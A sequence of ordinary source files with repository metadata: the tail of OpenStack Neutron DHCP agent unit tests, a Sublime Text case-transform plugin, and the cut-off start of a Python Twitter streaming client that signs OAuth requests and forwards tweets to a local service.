disable.assert_called_once_with(network.id)
self.assertFalse(self.cache.called)
self.assertFalse(self.call_driver.called)
self.cache.assert_has_calls(
[mock.call.get_network_by_id('net-id')])
def test_refresh_dhcp_helper_exception_during_rpc(self):
network = dhcp.NetModel(True, dict(id='net-id',
tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
admin_state_up=True,
subnets=[],
ports=[]))
self.cache.get_network_by_id.return_value = network
self.plugin.get_network_info.side_effect = Exception
with mock.patch.object(dhcp_agent.LOG, 'exception') as log:
self.dhcp.refresh_dhcp_helper(network.id)
self.assertFalse(self.call_driver.called)
self.cache.assert_has_calls(
[mock.call.get_network_by_id('net-id')])
self.assertTrue(log.called)
self.assertTrue(self.dhcp.schedule_resync.called)
def test_subnet_update_end(self):
payload = dict(subnet=dict(network_id=fake_network.id))
self.cache.get_network_by_id.return_value = fake_network
self.plugin.get_network_info.return_value = fake_network
self.dhcp.subnet_update_end(None, payload)
self.cache.assert_has_calls([mock.call.put(fake_network)])
self.call_driver.assert_called_once_with('reload_allocations',
fake_network)
def test_subnet_update_end_restart(self):
new_state = dhcp.NetModel(True, dict(id=fake_network.id,
tenant_id=fake_network.tenant_id,
admin_state_up=True,
subnets=[fake_subnet1, fake_subnet3],
ports=[fake_port1]))
payload = dict(subnet=dict(network_id=fake_network.id))
self.cache.get_network_by_id.return_value = fake_network
self.plugin.get_network_info.return_value = new_state
self.dhcp.subnet_update_end(None, payload)
self.cache.assert_has_calls([mock.call.put(new_state)])
self.call_driver.assert_called_once_with('restart',
new_state)
def test_subnet_update_end_delete_payload(self):
prev_state = dhcp.NetModel(True, dict(id=fake_network.id,
tenant_id=fake_network.tenant_id,
admin_state_up=True,
subnets=[fake_subnet1, fake_subnet3],
ports=[fake_port1]))
payload = dict(subnet_id=fake_subnet1.id)
self.cache.get_network_by_subnet_id.return_value = prev_state
self.cache.get_network_by_id.return_value = prev_state
self.plugin.get_network_info.return_value = fake_network
self.dhcp.subnet_delete_end(None, payload)
self.cache.assert_has_calls([
mock.call.get_network_by_subnet_id(
'bbbbbbbb-bbbb-bbbb-bbbbbbbbbbbb'),
mock.call.get_network_by_id('12345678-1234-5678-1234567890ab'),
mock.call.put(fake_network)])
self.call_driver.assert_called_once_with('restart',
fake_network)
def test_port_update_end(self):
payload = dict(port=fake_port2)
self.cache.get_network_by_id.return_value = fake_network
self.cache.get_port_by_id.return_value = fake_port2
self.dhcp.port_update_end(None, payload)
self.cache.assert_has_calls(
[mock.call.get_network_by_id(fake_port2.network_id),
mock.call.put_port(mock.ANY)])
self.call_driver.assert_called_once_with('reload_allocations',
fake_network)
def test_port_update_change_ip_on_port(self):
payload = dict(port=fake_port1)
self.cache.get_network_by_id.return_value = fake_network
updated_fake_port1 = copy.deepcopy(fake_port1)
updated_fake_port1.fixed_ips[0].ip_address = '172.9.9.99'
self.cache.get_port_by_id.return_value = updated_fake_port1
self.dhcp.port_update_end(None, payload)
self.cache.assert_has_calls(
[mock.call.get_network_by_id(fake_port1.network_id),
mock.call.put_port(mock.ANY)])
self.call_driver.assert_has_calls(
[mock.call.call_driver('reload_allocations', fake_network)])
def test_port_delete_end(self):
payload = dict(port_id=fake_port2.id)
self.cache.get_network_by_id.return_value = fake_network
self.cache.get_port_by_id.return_value = fake_port2
self.dhcp.port_delete_end(None, payload)
self.cache.assert_has_calls(
[mock.call.get_port_by_id(fake_port2.id),
mock.call.get_network_by_id(fake_network.id),
mock.call.remove_port(fake_port2)])
self.call_driver.assert_has_calls(
[mock.call.call_driver('reload_allocations', fake_network)])
def test_port_delete_end_unknown_port(self):
payload = dict(port_id='unknown')
self.cache.get_port_by_id.return_value = None
self.dhcp.port_delete_end(None, payload)
self.cache.assert_has_calls([mock.call.get_port_by_id('unknown')])
self.assertEqual(self.call_driver.call_count, 0)
class TestDhcpPluginApiProxy(base.BaseTestCase):
def setUp(self):
super(TestDhcpPluginApiProxy, self).setUp()
self.proxy = dhcp_agent.DhcpPluginApi('foo', {}, None)
self.proxy.host = 'foo'
self.call_p = mock.patch.object(self.proxy, 'call')
self.call = self.call_p.start()
self.make_msg_p = mock.patch.object(self.proxy, 'make_msg')
self.make_msg = self.make_msg_p.start()
def test_get_network_info(self):
self.call.return_value = dict(a=1)
retval = self.proxy.get_network_info('netid')
self.assertEqual(retval.a, 1)
self.assertTrue(self.call.called)
self.make_msg.assert_called_once_with('get_network_info',
network_id='netid',
host='foo')
def test_get_dhcp_port(self):
self.call.return_value = dict(a=1)
retval = self.proxy.get_dhcp_port('netid', 'devid')
self.assertEqual(retval.a, 1)
self.assertTrue(self.call.called)
self.make_msg.assert_called_once_with('get_dhcp_port',
network_id='netid',
device_id='devid',
host='foo')
def test_get_dhcp_port_none(self):
self.call.return_value = None
self.assertIsNone(self.proxy.get_dhcp_port('netid', 'devid'))
def test_get_active_networks_info(self):
self.proxy.get_active_networks_info()
self.make_msg.assert_called_once_with('get_active_networks_info',
host='foo')
def test_create_dhcp_port(self):
port_body = (
{'port':
{'name': '', 'admin_state_up': True,
'network_id': fake_network.id,
'tenant_id': fake_network.tenant_id,
'fixed_ips': [{'subnet_id': fake_fixed_ip1.subnet_id}],
'device_id': mock.ANY}})
self.proxy.create_dhcp_port(port_body)
self.make_msg.assert_called_once_with('create_dhcp_port',
port=port_body,
host='foo')
def test_create_dhcp_port_none(self):
self.call.return_value = None
port_body = (
{'port':
{'name': '', 'admin_state_up': True,
'network_id': fake_network.id,
'tenant_id': fake_network.tenant_id,
'fixed_ips': [{'subnet_id': fake_fixed_ip1.subnet_id}],
'device_id': mock.ANY}})
self.assertIsNone(self.proxy.create_dhcp_port(port_body))
def test_update_dhcp_port_none(self):
self.call.return_value = None
port_body = {'port': {'fixed_ips':
[{'subnet_id': fake_fixed_ip1.subnet_id}]}}
self.assertIsNone(self.proxy.update_dhcp_port(fake_port1.id,
port_body))
def test_update_dhcp_port(self):
port_body = {'port': {'fixed_ips':
[{'subnet_id': fake_fixed_ip1.subnet_id}]}}
self.proxy.update_dhcp_port(fake_port1.id, port_body)
self.make_msg.assert_called_once_with('update_dhcp_port',
port_id=fake_port1.id,
port=port_body,
host='foo')
def test_release_dhcp_port(self):
self.proxy.release_dhcp_port('netid', 'devid')
self.assertTrue(self.call.called)
self.make_msg.assert_called_once_with('release_dhcp_port',
network_id='netid',
device_id='devid',
host='foo')
def test_release_port_fixed_ip(self):
self.proxy.release_port_fixed_ip('netid', 'devid', 'subid')
self.assertTrue(self.call.called)
self.make_msg.assert_called_once_with('release_port_fixed_ip',
network_id='netid',
subnet_id='subid',
device_id='devid',
host='foo')
class TestNetworkCache(base.BaseTestCase):
def test_put_network(self):
nc = dhcp_agent.NetworkCache()
nc.put(fake_network)
self.assertEqual(nc.cache,
{fake_network.id: fake_network})
self.assertEqual(nc.subnet_lookup,
{fake_subnet1.id: fake_network.id,
fake_subnet2.id: fake_network.id})
self.assertEqual(nc.port_lookup,
{fake_port1.id: fake_network.id})
def test_put_network_existing(self):
prev_network_info = mock.Mock()
nc = dhcp_agent.NetworkCache()
with mock.patch.object(nc, 'remove') as remove:
nc.cache[fake_network.id] = prev_network_info
nc.put(fake_network)
remove.assert_called_once_with(prev_network_info)
self.assertEqual(nc.cache,
{fake_network.id: fake_network})
self.assertEqual(nc.subnet_lookup,
{fake_subnet1.id: fake_network.id,
fake_subnet2.id: fake_network.id})
self.assertEqual(nc.port_lookup,
{fake_port1.id: fake_network.id})
def test_remove_network(self):
nc = dhcp_agent.NetworkCache()
nc.cache = {fake_network.id: fake_network}
nc.subnet_lookup = {fake_subnet1.id: fake_network.id,
fake_subnet2.id: fake_network.id}
nc.port_lookup = {fake_port1.id: fake_network.id}
nc.remove(fake_network)
self.assertEqual(len(nc.cache), 0)
self.assertEqual(len(nc.subnet_lookup), 0)
self.assertEqual(len(nc.port_lookup), 0)
def test_get_network_by_id(self):
nc = dhcp_agent.NetworkCache()
nc.put(fake_network)
self.assertEqual(nc.get_network_by_id(fake_network.id), fake_network)
def test_get_network_ids(self):
nc = dhcp_agent.NetworkCache()
nc.put(fake_network)
self.assertEqual(nc.get_network_ids(), [fake_network.id])
def test_get_network_by_subnet_id(self):
nc = dhcp_agent.NetworkCache()
nc.put(fake_network)
self.assertEqual(nc.get_network_by_subnet_id(fake_subnet1.id),
fake_network)
def test_get_network_by_port_id(self):
nc = dhcp_agent.NetworkCache()
nc.put(fake_network)
self.assertEqual(nc.get_network_by_port_id(fake_port1.id),
fake_network)
def test_put_port(self):
fake_net = dhcp.NetModel(
True, dict(id='12345678-1234-5678-1234567890ab',
tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
subnets=[fake_subnet1],
ports=[fake_port1]))
nc = dhcp_agent.NetworkCache()
nc.put(fake_net)
nc.put_port(fake_port2)
self.assertEqual(len(nc.port_lookup), 2)
self.assertIn(fake_port2, fake_net.ports)
def test_put_port_existing(self):
fake_net = dhcp.NetModel(
True, dict(id='12345678-1234-5678-1234567890ab',
tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
subnets=[fake_subnet1],
ports=[fake_port1, fake_port2]))
nc = dhcp_agent.NetworkCache()
nc.put(fake_net)
nc.put_port(fake_port2)
self.assertEqual(len(nc.port_lookup), 2)
self.assertIn(fake_port2, fake_net.ports)
def test_remove_port_existing(self):
fake_net = dhcp.NetModel(
True, dict(id='12345678-1234-5678-1234567890ab',
tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
subnets=[fake_subnet1],
ports=[fake_port1, fake_port2]))
nc = dhcp_agent.NetworkCache()
nc.put(fake_net)
nc.remove_port(fake_port2)
self.assertEqual(len(nc.port_lookup), 1)
self.assertNotIn(fake_port2, fake_net.ports)
def test_get_port_by_id(self):
nc = dhcp_agent.NetworkCache()
nc.put(fake_network)
self.assertEqual(nc.get_port_by_id(fake_port1.id), fake_port1)
class FakePort1:
id = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
class FakeV4Subnet:
id = 'dddddddd-dddd-dddd-dddd-dddddddddddd'
ip_version = 4
cidr = '192.168.0.0/24'
gateway_ip = '192.168.0.1'
enable_dhcp = True
class FakeV4SubnetNoGateway:
id = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
ip_version = 4
cidr = '192.168.1.0/24'
gateway_ip = None
enable_dhcp = True
class FakeV4Network:
id = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
subnets = [FakeV4Subnet()]
ports = [FakePort1()]
namespace = 'qdhcp-aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
class FakeV4NetworkNoSubnet:
id = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
subnets = []
ports = []
class FakeV4NetworkNoGateway:
id = 'cccccccc-cccc-cccc-cccc-cccccccccccc'
subnets = [FakeV4SubnetNoGateway()]
ports = [FakePort1()]
class TestDeviceManager(base.BaseTestCase):
def setUp(self):
super(TestDeviceManager, self).setUp()
config.register_interface_driver_opts_helper(cfg.CONF)
config.register_use_namespaces_opts_helper(cfg.CONF)
cfg.CONF.register_opts(dhcp_agent.DhcpAgent.OPTS)
cfg.CONF.register_opts(dhcp.OPTS)
cfg.CONF.set_override('interface_driver',
'neutron.agent.linux.interface.NullDriver')
config.register_root_helper(cfg.CONF)
cfg.CONF.set_override('use_namespaces', True)
cfg.CONF.set_override('enable_isolated_metadata', True)
self.ensure_device_is_ready_p = mock.patch(
'neutron.agent.linux.ip_lib.ensure_device_is_ready')
self.ensure_device_is_ready = (self.ensure_device_is_ready_p.start())
self.dvr_cls_p = mock.patch('neutron.agent.linux.interface.NullDriver')
self.iproute_cls_p = mock.patch('neutron.agent.linux.'
'ip_lib.IpRouteCommand')
driver_cls = self.dvr_cls_p.start()
iproute_cls = self.iproute_cls_p.start()
self.mock_driver = mock.MagicMock()
self.mock_driver.DEV_NAME_LEN = (
interface.LinuxInterfaceDriver.DEV_NAME_LEN)
self.mock_iproute = mock.MagicMock()
driver_cls.return_value = self.mock_driver
iproute_cls.return_value = self.mock_iproute
def _test_setup_helper(self, device_is_ready, net=None, port=None):
net = net or fake_network
port = port or fake_port1
plugin = mock.Mock()
plugin.create_dhcp_port.return_value = port or fake_port1
plugin.get_dhcp_port.return_value = port or fake_port1
self.ensure_device_is_ready.return_value = device_is_ready
self.mock_driver.get_device_name.return_value = 'tap12345678-12'
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, plugin)
dh._set_default_route = mock.Mock()
interface_name = dh.setup(net)
self.assertEqual(interface_name, 'tap12345678-12')
plugin.assert_has_calls([
mock.call.create_dhcp_port(
{'port': {'name': '', 'admin_state_up': True,
'network_id': net.id, 'tenant_id': net.tenant_id,
'fixed_ips':
[{'subnet_id': fake_fixed_ip1.subnet_id}],
'device_id': mock.ANY}})])
expected_ips = ['172.9.9.9/24', '169.254.169.254/16']
expected = [
mock.call.get_device_name(port),
mock.call.init_l3(
'tap12345678-12',
expected_ips,
namespace=net.namespace)]
if not device_is_ready:
expected.insert(1,
mock.call.plug(net.id,
port.id,
'tap12345678-12',
'aa:bb:cc:dd:ee:ff',
namespace=net.namespace))
self.mock_driver.assert_has_calls(expected)
dh._set_default_route.assert_called_once_with(net, 'tap12345678-12')
def test_setup(self):
cfg.CONF.set_override('enable_metadata_network', False)
self._test_setup_helper(False)
cfg.CONF.set_override('enable_metadata_network', True)
self._test_setup_helper(False)
def test_setup_device_is_ready(self):
self._test_setup_helper(True)
def test_create_dhcp_port_raise_conflict(self):
plugin = mock.Mock()
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, plugin)
plugin.create_dhcp_port.return_value = None
self.assertRaises(exceptions.Conflict,
dh.setup_dhcp_port,
fake_network)
def test_create_dhcp_port_create_new(self):
plugin = mock.Mock()
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, plugin)
plugin.create_dhcp_port.return_value = fake_network.ports[0]
dh.setup_dhcp_port(fake_network)
plugin.assert_has_calls([
mock.call.create_dhcp_port(
{'port': {'name': '', 'admin_state_up': True,
'network_id':
fake_network.id, 'tenant_id': fake_network.tenant_id,
'fixed_ips':
[{'subnet_id': fake_fixed_ip1.subnet_id}],
'device_id': mock.ANY}})])
def test_create_dhcp_port_update_add_subnet(self):
plugin = mock.Mock()
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, plugin)
fake_network_copy = copy.deepcopy(fake_network)
fake_network_copy.ports[0].device_id = dh.get_device_id(fake_network)
fake_network_copy.subnets[1].enable_dhcp = True
plugin.update_dhcp_port.return_value = fake_network.ports[0]
dh.setup_dhcp_port(fake_network_copy)
port_body = {'port': {
'network_id': fake_network.id,
'fixed_ips': [{'subnet_id': fake_fixed_ip1.subnet_id,
'ip_address': fake_fixed_ip1.ip_address},
{'subnet_id': fake_subnet2.id}]}}
plugin.assert_has_calls([
mock.call.update_dhcp_port(fake_network_copy.ports[0].id,
port_body)])
def test_update_dhcp_port_raises_conflict(self):
plugin = mock.Mock()
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, plugin)
fake_network_copy = copy.deepcopy(fake_network)
fake_network_copy.ports[0].device_id = dh.get_device_id(fake_network)
fake_network_copy.subnets[1].enable_dhcp = True
plugin.update_dhcp_port.return_value = None
self.assertRaises(exceptions.Conflict,
dh.setup_dhcp_port,
fake_network_copy)
def test_create_dhcp_port_no_update_or_create(self):
plugin = mock.Mock()
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, plugin)
fake_network_copy = copy.deepcopy(fake_network)
fake_network_copy.ports[0].device_id = dh.get_device_id(fake_network)
dh.setup_dhcp_port(fake_network_copy)
self.assertFalse(plugin.setup_dhcp_port.called)
self.assertFalse(plugin.update_dhcp_port.called)
def test_destroy(self):
fake_net = dhcp.NetModel(
True, dict(id='12345678-1234-5678-1234567890ab',
tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa'))
fake_port = dhcp.DictModel(
dict(id='12345678-1234-aaaa-1234567890ab',
mac_address='aa:bb:cc:dd:ee:ff'))
with mock.patch('neutron.agent.linux.interface.NullDriver') as dvr_cls:
mock_driver = mock.MagicMock()
mock_driver.get_device_name.return_value = 'tap12345678-12'
dvr_cls.return_value = mock_driver
plugin = mock.Mock()
plugin.get_dhcp_port.return_value = fake_port
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, plugin)
dh.destroy(fake_net, 'tap12345678-12')
dvr_cls.assert_called_once_with(cfg.CONF)
mock_driver.assert_has_calls(
[mock.call.unplug('tap12345678-12',
namespace='qdhcp-' + fake_net.id)])
plugin.assert_has_calls(
[mock.call.release_dhcp_port(fake_net.id, mock.ANY)])
def test_get_interface_name(self):
fake_net = dhcp.NetModel(
True, dict(id='12345678-1234-5678-1234567890ab',
tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa'))
fake_port = dhcp.DictModel(
dict(id='12345678-1234-aaaa-1234567890ab',
mac_address='aa:bb:cc:dd:ee:ff'))
with mock.patch('neutron.agent.linux.interface.NullDriver') as dvr_cls:
mock_driver = mock.MagicMock()
mock_driver.get_device_name.return_value = 'tap12345678-12'
dvr_cls.return_value = mock_driver
plugin = mock.Mock()
plugin.get_dhcp_port.return_value = fake_port
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, plugin)
dh.get_interface_name(fake_net, fake_port)
dvr_cls.assert_called_once_with(cfg.CONF)
mock_driver.assert_has_calls(
[mock.call.get_device_name(fake_port)])
self.assertEqual(len(plugin.mock_calls), 0)
def test_get_device_id(self):
fake_net = dhcp.NetModel(
True, dict(id='12345678-1234-5678-1234567890ab',
tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa'))
expected = ('dhcp1ae5f96c-c527-5079-82ea-371a01645457-12345678-1234-'
'5678-1234567890ab')
with mock.patch('uuid.uuid5') as uuid5:
uuid5.return_value = '1ae5f96c-c527-5079-82ea-371a01645457'
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
uuid5.called_once_with(uuid.NAMESPACE_DNS, cfg.CONF.host)
self.assertEqual(dh.get_device_id(fake_net), expected)
def test_update(self):
# Try with namespaces and no metadata network
cfg.CONF.set_override('use_namespaces', True)
cfg.CONF.set_override('enable_metadata_network', False)
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
dh._set_default_route = mock.Mock()
network = mock.Mock()
dh.update(network, 'ns-12345678-12')
dh._set_default_route.assert_called_once_with(network,
'ns-12345678-12')
# No namespaces, shouldn't set default route.
cfg.CONF.set_override('use_namespaces', False)
cfg.CONF.set_override('enable_metadata_network', False)
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
dh._set_default_route = mock.Mock()
dh.update(FakeV4Network(), 'tap12345678-12')
self.assertFalse(dh._set_default_route.called)
# Meta data network enabled, don't interfere with its gateway.
cfg.CONF.set_override('use_namespaces', True)
cfg.CONF.set_override('enable_metadata_network', True)
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
dh._set_default_route = mock.Mock()
dh.update(FakeV4Network(), 'ns-12345678-12')
self.assertTrue(dh._set_default_route.called)
# For completeness
cfg.CONF.set_override('use_namespaces', False)
cfg.CONF.set_override('enable_metadata_network', True)
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
dh._set_default_route = mock.Mock()
dh.update(FakeV4Network(), 'ns-12345678-12')
self.assertFalse(dh._set_default_route.called)
def test_set_default_route(self):
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
with mock.patch.object(dhcp.ip_lib, 'IPDevice') as mock_IPDevice:
device = mock.Mock()
mock_IPDevice.return_value = device
device.route.get_gateway.return_value = None
# Basic one subnet with gateway.
network = FakeV4Network()
dh._set_default_route(network, 'tap-name')
self.assertEqual(device.route.get_gateway.call_count, 1)
self.assertFalse(device.route.delete_gateway.called)
device.route.add_gateway.assert_called_once_with('192.168.0.1')
def test_set_default_route_no_subnet(self):
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
with mock.patch.object(dhcp.ip_lib, 'IPDevice') as mock_IPDevice:
device = mock.Mock()
mock_IPDevice.return_value = device
device.route.get_gateway.return_value = None
network = FakeV4NetworkNoSubnet()
network.namespace = 'qdhcp-1234'
dh._set_default_route(network, 'tap-name')
self.assertEqual(device.route.get_gateway.call_count, 1)
self.assertFalse(device.route.delete_gateway.called)
self.assertFalse(device.route.add_gateway.called)
def test_set_default_route_no_subnet_delete_gateway(self):
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
with mock.patch.object(dhcp.ip_lib, 'IPDevice') as mock_IPDevice:
device = mock.Mock()
mock_IPDevice.return_value = device
device.route.get_gateway.return_value = dict(gateway='192.168.0.1')
network = FakeV4NetworkNoSubnet()
network.namespace = 'qdhcp-1234'
dh._set_default_route(network, 'tap-name')
self.assertEqual(device.route.get_gateway.call_count, 1)
device.route.delete_gateway.assert_called_once_with('192.168.0.1')
self.assertFalse(device.route.add_gateway.called)
def test_set_default_route_no_gateway(self):
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
with mock.patch.object(dhcp.ip_lib, 'IPDevice') as mock_IPDevice:
device = mock.Mock()
mock_IPDevice.return_value = device
device.route.get_gateway.return_value = dict(gateway='192.168.0.1')
network = FakeV4NetworkNoGateway()
network.namespace = 'qdhcp-1234'
dh._set_default_route(network, 'tap-name')
self.assertEqual(device.route.get_gateway.call_count, 1)
device.route.delete_gateway.assert_called_once_with('192.168.0.1')
self.assertFalse(device.route.add_gateway.called)
def test_set_default_route_do_nothing(self):
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
with mock.patch.object(dhcp.ip_lib, 'IPDevice') as mock_IPDevice:
device = mock.Mock()
mock_IPDevice.return_value = device
device.route.get_gateway.return_value = dict(gateway='192.168.0.1')
network = FakeV4Network()
dh._set_default_route(network, 'tap-name')
self.assertEqual(device.route.get_gateway.call_count, 1)
self.assertFalse(device.route.delete_gateway.called)
self.assertFalse(device.route.add_gateway.called)
def test_set_default_route_change_gateway(self):
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
with mock.patch.object(dhcp.ip_lib, 'IPDevice') as mock_IPDevice:
device = mock.Mock()
mock_IPDevice.return_value = device
device.route.get_gateway.return_value = dict(gateway='192.168.0.2')
network = FakeV4Network()
dh._set_default_route(network, 'tap-name')
self.assertEqual(device.route.get_gateway.call_count, 1)
self.assertFalse(device.route.delete_gateway.called)
device.route.add_gateway.assert_called_once_with('192.168.0.1')
def test_set_default_route_two_subnets(self):
# Try two subnets. Should set gateway from the first.
dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
with mock.patch.object(dhcp.ip_lib, 'IPDevice') as mock_IPDevice:
device = mock.Mock()
mock_IPDevice.return_value = device
device.route.get_gateway.return_value = None
network = FakeV4Network()
subnet2 = FakeV4Subnet()
subnet2.gateway_ip = '192.168.1.1'
network.subnets = [subnet2, FakeV4Subnet()]
dh._set_default_route(network, 'tap-name')
self.assertEqual(device.route.get_gateway.call_count, 1)
self.assertFalse(device.route.delete_gateway.called)
device.route.add_gateway.assert_called_once_with('192.168.1.1')
class TestDictModel(base.BaseTestCase):
def test_basic_dict(self):
d = dict(a=1, b=2)
m = dhcp.DictModel(d)
self.assertEqual(m.a, 1)
self.assertEqual(m.b, 2)
def test_dict_has_sub_dict(self):
d = dict(a=dict(b=2))
m = dhcp.DictModel(d)
self.assertEqual(m.a.b, 2)
def test_dict_contains_list(self):
d = dict(a=[1, 2])
m = dhcp.DictModel(d)
self.assertEqual(m.a, [1, 2])
def test_dict_contains_list_of_dicts(self):
d = dict(a=[dict(b=2), dict(c=3)])
m = dhcp.DictModel(d)
self.assertEqual(m.a[0].b, 2)
self.assertEqual(m.a[1].c, 3)
class TestNetModel(base.BaseTestCase):
def test_ns_name(self):
network = dhcp.NetModel(True, {'id': 'foo'})
self.assertEqual(network.namespace, 'qdhcp-foo')
def test_ns_name_false_namespace(self):
network = dhcp.NetModel(False, {'id': 'foo'})
self.assertIsNone(network.namespace)
def test_ns_name_none_namespace(self):
network = dhcp.NetModel(None, {'id': 'foo'})
self.assertIsNone(network.namespace)
|
{
"content_hash": "941a26072fad287fd98230e9ccf2e14b",
"timestamp": "",
"source": "github",
"line_count": 1493,
"max_line_length": 79,
"avg_line_length": 43.68050904219692,
"alnum_prop": 0.5675228091696696,
"repo_name": "jumpstarter-io/neutron",
"id": "c6f98643fe8e309f1fbb20bc2aa4e0e90d1c4ea0",
"size": "65851",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "neutron/tests/unit/test_dhcp_agent.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
}
|
import string
import sublime
import sublime_plugin
class Transformer(sublime_plugin.TextCommand):
def run(self, edit):
self.transform(self.transformer[0], self.view, edit)
def transform(self, f, view, edit):
for s in view.sel():
if s.empty():
s = view.word(s)
txt = f(view.substr(s))
view.replace(edit, s, txt)
class SwapCaseCommand(Transformer):
transformer = string.swapcase,
class UpperCaseCommand(Transformer):
transformer = string.upper,
class LowerCaseCommand(Transformer):
transformer = string.lower,
class TitleCaseCommand(Transformer):
transformer = lambda s: string.capwords(s, " "),
def rot13(ch):
o = ord(ch)
if o >= ord('a') and o <= ord('z'):
return unichr((o - ord('a') + 13) % 26 + ord('a'))
if o >= ord('A') and o <= ord('Z'):
return unichr((o - ord('A') + 13) % 26 + ord('A'))
return ch
class Rot13Command(Transformer):
transformer = lambda s: "".join([rot13(ch) for ch in s]),
|
{
"content_hash": "54d78633365e5b6b8c1271ab90e814fc",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 61,
"avg_line_length": 27.18421052631579,
"alnum_prop": 0.6069699903194579,
"repo_name": "robotwholearned/dotfilesCustom",
"id": "a19451300a4d9316052c7afc8d2c22713e0d170e",
"size": "1033",
"binary": false,
"copies": "10",
"ref": "refs/heads/master",
"path": "Sublime Text 2/Packages/Default/transform.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "535082"
},
{
"name": "Shell",
"bytes": "2305"
}
],
"symlink_target": ""
}
|
'''
Example for autodoc
'''
import oauth2 as oauth
import multiprocessing
import sys, time, datetime
import bson.json_util
import requests
import httplib
# local
from drenaj.client.config.config import *
class StreamCatcher(multiprocessing.Process):
'''
This is a fantastic class!
'''
def __init__(self, url = "", campaign_id="", postdata = {}, keystore = KeyStore()):
signal.signal(signal.SIGINT, signal.SIG_IGN)
signal.signal(signal.SIGTERM, self.on_terminate)
# required for threads
super(StreamCatcher, self).__init__()
if url == "":
self.filter_url = "https://stream.twitter.com/1.1/statuses/filter.json"
else:
self.filter_url = url
self.prev_buf = ''
self.drenaj_auth_secrets = keystore.drenaj_auth_secrets.copy()
self.access_tokens = keystore.acquire_access_tokens()
self.requests_session = requests.Session()
self.requests_session.stream = True
self.postdata = postdata
self.keystore = keystore
self.filter_request = self.prepare_request(postdata, keystore)
self.abortEvent = multiprocessing.Event()
self.drenaj_store_url = 'http://'+DRENAJ_APP_HOST+':'+str(DRENAJ_APP_PORT[DRENAJ_APP_ENVIRONMENT])+'/statuses/store'
self.campaign_id = campaign_id
self.streamer_id = ":".join([campaign_id, postdata['track']])
def on_terminate(self, signal_no, frame):
print "Cleaning up for streamer_id=%s..." % self.streamer_id
self.keystore.release_access_tokens(self.access_tokens)
self.requests_session.close()
os.kill(os.getppid(), signal.SIGINT)
sys.exit(0)
def prepare_request(self, postdata, keystore=KeyStore()):
authorization_header = self.sign_request(postdata, keystore)
req = requests.Request('POST', self.filter_url)
req.headers.update({'Authorization': authorization_header})
req.data.update(postdata)
return req.prepare()
def sign_request(self, postdata, keystore=KeyStore()):
token = oauth.Token(key=self.access_tokens[0][0],
secret=self.access_tokens[0][1])
consumer = oauth.Consumer(key=keystore.app_consumer_key,
secret=keystore.app_consumer_secret)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
params = {
'oauth_version': "1.0",
'oauth_nonce': oauth.generate_nonce(),
'oauth_timestamp': int(time.time())
}
# Set our token/key parameters
params['oauth_token'] = token.key
params['oauth_consumer_key'] = consumer.key
# prepare POST request on our own.
for key, value in postdata.items():
params[key] = value
req = oauth.Request(method="POST",
url=self.filter_url,
parameters=params,
is_form_encoded=True)
# Sign the request.
req.sign_request(signature_method, consumer, token)
header = req.to_header(realm='Firehose')
return header['Authorization']
def command(self, command_name):
if command_name == 'stop':
self.abortEvent.set()
def datetime_hook(self, dct):
if 'created_at' in dct:
time_struct = time.strptime(dct['created_at'], "%a %b %d %H:%M:%S +0000 %Y") #Tue Apr 26 08:57:55 +0000 2011
dct['created_at'] = datetime.datetime.fromtimestamp(time.mktime(time_struct))
return dct
return dct
def writefunction(self, buf):
print buf
# mongo
self.prev_buf = self.prev_buf + (buf+'\r\n')
params = {'campaign_id': self.campaign_id }
if '\r\n' in self.prev_buf:
parts = self.prev_buf.split('\r\n')
if len(parts) > 1:
tmp = []
for p in parts[0:-1]:
if len(p) > 0:
# obj = json.loads(p, object_hook=self.datetime_hook)
tmp.append(bson.json_util.loads(p))
self.prev_buf = parts[-1]
else:
tmp = [bson.json_util.loads(parts[0])]
self.prev_buf = ''
# TODO: check for this.
# When Twitter closes connection on itself, i.e. another streaming api connection is made with the same credentials, the response is like this:
# {"disconnect":{"code":7,"stream_name":"thbounsigmalab1-statuses227378","reason":"admin logout"}}
self.post_to_gateway(params, tmp)
# TODO: Is it possible to make this call concurrent?
